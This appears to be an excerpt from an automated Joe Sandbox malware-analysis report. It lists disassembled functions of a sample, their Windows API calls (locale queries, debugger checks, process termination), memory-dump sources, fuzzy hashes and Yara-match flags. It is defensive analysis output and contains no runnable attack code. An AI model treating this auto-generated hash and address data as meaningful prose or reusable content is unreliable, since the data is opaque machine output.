Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420372
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004203C3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420483

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
Instruction ID: 150eb58c917d6dfbd7f4c2a18d44eb002ac57a30d794a2eb47e087b0f294e0c3
Opcode Fuzzy Hash: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
Instruction Fuzzy Hash: D46185717001279BDB28DF25DC81BB677E8EF14344F50807AE905C6642E77CE995CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041073B Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00410833
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041083D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041084A

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction ID: d1fab33c372cae0273f805137467810c70e9cba24fd9c5a15224a60e011b092e
Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction Fuzzy Hash: E031C47490121C9BCB21EF25D9887CDB7B8BF08310F5041EAE41CA7291E7749F858F88

Uniqueness

Uniqueness Score: -1.00%

Function 05C009A2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 05C00A9A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 05C00AA4
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 05C00AB1

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction ID: 8da9e570bd193541d6cef52aef4e734733e93789e4e4673cf25f4edf28567bd0
Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction Fuzzy Hash: 7431B57490122C9BCF21DF64DC88B9DB7B8BF08710F5045EAE50CA7290E7309B858F45

Uniqueness

Uniqueness Score: -1.00%

Function 05C03C4E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,05C03C24,00000003,00438DB0,0000000C,05C03D7B,00000003,00000002,00000000,?,05C02DD2,00000003), ref: 05C03C6F
TerminateProcess.KERNEL32(00000000,?,05C03C24,00000003,00438DB0,0000000C,05C03D7B,00000003,00000002,00000000,?,05C02DD2,00000003), ref: 05C03C76
ExitProcess.KERNEL32 ref: 05C03C88

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction ID: c3691deebbd50be6e38452d036816e4c138da7580d128ee6af5d79df1bd31786
Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction Fuzzy Hash: D4E04631200189ABCF226F24CE0CA993F6AFB04691F509824FD068A271CB35EF42DA84

Uniqueness

Uniqueness Score: -1.00%

Function 05BF092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 05BF095F
l, xrefs: 05BF0966
GetProcAddress., xrefs: 05BF09DC, 05BF09DF, 05BF09E4

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 7fdce0fc92dab66619a768036af5d0bdbd286b957550197339bc7b9f2509892e
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 09318DB6900609CFDB10DF99C884AADBBF5FF08324F54408AD942A7321D771FA49CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004174E4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537

Strings

GetLocaleInfoEx, xrefs: 004174F5, 004174FF

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
Instruction ID: 87fd85214f38bea17e9e0867028b4e6f8bd84d2b32a19a69094aa8269c1633f8
Opcode Fuzzy Hash: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
Instruction Fuzzy Hash: 0AF0F631740218B7DB11AF61AC01FBE3B72DF04710F90007AFC0926291CA355E60969D

Uniqueness

Uniqueness Score: -1.00%

Function 05C02607 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
Instruction ID: d128683f91d25d5fdcd200c6d1d1881e7a151df945e7816897e936049b4f70bb
Opcode Fuzzy Hash: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
Instruction Fuzzy Hash: BD024C75E002199FDF14CFA9C884AADB7F1FF48314F25866AD919E7384D731AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7FC Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

@, xrefs: 0040C823
@, xrefs: 0040C843

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction ID: bacc100dc0a0088e2915408729627ff8f5d38c09acb905e5d4049eb219c2e84e
Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction Fuzzy Hash: 9E314B67144182CBD2049728C8E45B7B781FA8532272DC3FBD091AB7CAD23E9847960C

Uniqueness

Uniqueness Score: -1.00%

Function 05BFCA63 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

@, xrefs: 05BFCA8A
@, xrefs: 05BFCAAA

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction ID: 5f0348751901aa4ddc92f8ffc3b2d024bc2af4941f09548bd4eb3d6f05a55fc7
Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction Fuzzy Hash: DC315C3A14C18E47C315CB2DD8B45A2BF81FAC612072D43F9D2828F64BD265ACCED700

Uniqueness

Uniqueness Score: -1.00%

Function 0041B722 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041B71D,?,?,00000008,?,?,004234FF,00000000), ref: 0041B94F

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction ID: 77e1d80032caf57d447ccd467e54c4f0879ce58ba2590176158d9b4cb40e0a8d
Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction Fuzzy Hash: F4B13C71620608DFD715CF28C48ABA57BE0FF45364F298659E999CF3A1C339D982CB84

Uniqueness

Uniqueness Score: -1.00%

Function 05C0B989 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,05C0B984,00000000,?,00000008,?,?,05C13766,00000000), ref: 05C0BBB6

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction ID: 975ef813f2b52af952796bb2600308c584790425c2555feeecbc99ffd9dd48ef
Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction Fuzzy Hash: 07B16C316146098FDB15CF28C48AB697BE1FF45368F259A58E89ACF2E1C735DE81CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0042056E Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205C2

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction ID: 81f412bf0acab0c669cc413bed1d2c5f28af9b0bc2236bf2d8b3c2af5f6810e7
Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction Fuzzy Hash: CD21A472A10126AFDB249F25EC41BBB73E8EB84314F50007BE905D6242EB78AD94CB59

Uniqueness

Uniqueness Score: -1.00%

Function 05C107D5 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 05C06F80: GetLastError.KERNEL32(?,?,05BFE697,?,?,?,05BFED94,?), ref: 05C06F84
Part of subcall function 05C06F80: _free.LIBCMT ref: 05C06FB7
Part of subcall function 05C06F80: SetLastError.KERNEL32(00000000), ref: 05C06FF8
Part of subcall function 05C06F80: _abort.LIBCMT ref: 05C06FFE

Part of subcall function 05C06F80: _free.LIBCMT ref: 05C06FDF
Part of subcall function 05C06F80: SetLastError.KERNEL32(00000000), ref: 05C06FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 05C10829

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction ID: d491969900d807e51d40da26de6e2f5fc8b162220621595b48ba10b5ba1497e6
Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction Fuzzy Hash: 7321D6726142069FEB24AE24CC49F7A73A8FB41310F00057AED05E6180EF34EA84EB98

Uniqueness

Uniqueness Score: -1.00%

Function 004201F6 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 00420268

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction ID: 80b9233af1491a43965ff49f25878bf7386ded64d37c123707e1c04ccab01a49
Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction Fuzzy Hash: 2E11593A3003058FDB189F79E8955BABBD1FF80358B54442EE94647B01D775AC42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 05C1045D Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 05C06F80: GetLastError.KERNEL32(?,?,05BFE697,?,?,?,05BFED94,?), ref: 05C06F84
Part of subcall function 05C06F80: _free.LIBCMT ref: 05C06FB7
Part of subcall function 05C06F80: SetLastError.KERNEL32(00000000), ref: 05C06FF8
Part of subcall function 05C06F80: _abort.LIBCMT ref: 05C06FFE

EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 05C104CF

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction ID: eb85525f3004a3585baa34330e8c85ea88bcaf777014139c45f311a1d1325de9
Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction Fuzzy Hash: E71159372003018FDB189F39C898A7AB792FF85318B14482CE98657A40D3716582DB44

Uniqueness

Uniqueness Score: -1.00%

Function 0042079E Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042053C,00000000,00000000,?), ref: 004207CA

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction ID: 232df0c2e22441a9dd69ecf2977a2312304a26c18b6acff2860949399b437602
Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction Fuzzy Hash: 59F04932B00135ABDB285A25E8057BB77E8EB40314F51042BEC05A3641EB78BD41CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 05C10A05 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 05C06F80: GetLastError.KERNEL32(?,?,05BFE697,?,?,?,05BFED94,?), ref: 05C06F84
Part of subcall function 05C06F80: _free.LIBCMT ref: 05C06FB7
Part of subcall function 05C06F80: SetLastError.KERNEL32(00000000), ref: 05C06FF8
Part of subcall function 05C06F80: _abort.LIBCMT ref: 05C06FFE

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,05C107A3,00000000,00000000,?), ref: 05C10A31

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction ID: 04df813798b7a6e1501b5b94264e09a81fc6dfb66ce039f62aea8cd2a11326e2
Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction Fuzzy Hash: F6F0F432A11215AFDB289A64880DBBA7769FB41654F044C69ED0AB3140EA74BF82D7D8

Uniqueness

Uniqueness Score: -1.00%

Function 05C107D3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 05C06F80: GetLastError.KERNEL32(?,?,05BFE697,?,?,?,05BFED94,?), ref: 05C06F84
Part of subcall function 05C06F80: _free.LIBCMT ref: 05C06FB7
Part of subcall function 05C06F80: SetLastError.KERNEL32(00000000), ref: 05C06FF8
Part of subcall function 05C06F80: _abort.LIBCMT ref: 05C06FFE

Part of subcall function 05C06F80: _free.LIBCMT ref: 05C06FDF
Part of subcall function 05C06F80: SetLastError.KERNEL32(00000000), ref: 05C06FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 05C10829

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
Instruction ID: 3bde665f5e33953d21f2884960978481bb480e9e2abf21b4c78d1e19688f1ba2
Opcode Fuzzy Hash: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
Instruction Fuzzy Hash: 32F0A9327552099BDB14AF64DC49EBA73ACDB45310F0005B9E906D7240DE74AD4597D4

Uniqueness

Uniqueness Score: -1.00%

Function 00420291 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 004202DD

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction ID: d57b86ad11fc321639f916cdd89717e5b85f45a329514cfdd24aab137e17032f
Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction Fuzzy Hash: 4CF0F4363003149FDB249E3AE88566A7BD1EB80358B55806FE9418B641D6B59C41CA14

Uniqueness

Uniqueness Score: -1.00%

Function 05C104F8 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 05C06F80: GetLastError.KERNEL32(?,?,05BFE697,?,?,?,05BFED94,?), ref: 05C06F84
Part of subcall function 05C06F80: _free.LIBCMT ref: 05C06FB7
Part of subcall function 05C06F80: SetLastError.KERNEL32(00000000), ref: 05C06FF8
Part of subcall function 05C06F80: _abort.LIBCMT ref: 05C06FFE

EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 05C10544

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction ID: bd78cf5e0869bce55ac7460cdf8fa8976a30e1a9f60c7af741b2a672560f8e16
Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction Fuzzy Hash: 3CF028363003049FDB249F799C88A7A7B91FF82358F04886DFD069B640D671D981EA48

Uniqueness

Uniqueness Score: -1.00%

Function 05C0774B Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,05C04002,?,00000004), ref: 05C0779E

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
Instruction ID: 0fda86cb180968ca656a073793c338855e8bd0fafa73afd2303ccea7fa2fa0b4
Opcode Fuzzy Hash: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
Instruction Fuzzy Hash: E5F0F631740218BBDF15AF64EC05F7E3BB2EF04B11F900475FC0966190CA715E249699

Uniqueness

Uniqueness Score: -1.00%

Function 004170F1 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 004119FB: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,00438F18,00000008,00416B87,?,?,?), ref: 00411A0A

EnumSystemLocalesW.KERNEL32(Function_000170AB,00000001,00438F98,0000000C), ref: 00417129

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction ID: 227376a4ab674bdc9c4c41bbf3289077a45538867ed31d3f45bd6c9a80692724
Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction Fuzzy Hash: CEF03C72A60204AFEB14EF69D846B9D7BF0EB04724F10516AF514DB2E2CB788994CB49

Uniqueness

Uniqueness Score: -1.00%

Function 05C07358 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 05C01C62: RtlEnterCriticalSection.NTDLL(?), ref: 05C01C71

EnumSystemLocalesW.KERNEL32(004170AB,00000001,00438F98,0000000C), ref: 05C07390

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction ID: d239f385795b7f44f51c3c78e2059b7092504b55dca4ad177743f37327887d81
Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction Fuzzy Hash: CCF04F32A50304AFEB14EF68DC49B5D77F0EB04724F10656AF504DB2E0CB7499489B49

Uniqueness

Uniqueness Score: -1.00%

Function 004201AB Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 004201E2

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction ID: 1f93f3ac1edaee4f5bdf4820daeb7c54606ccdf48e22ceddedb235dadc806722
Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction Fuzzy Hash: FAF05C3530021557CB089F36EC056767FD1FFC1714F46405EEE058B242C676D852C754

Uniqueness

Uniqueness Score: -1.00%

Function 05C10412 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

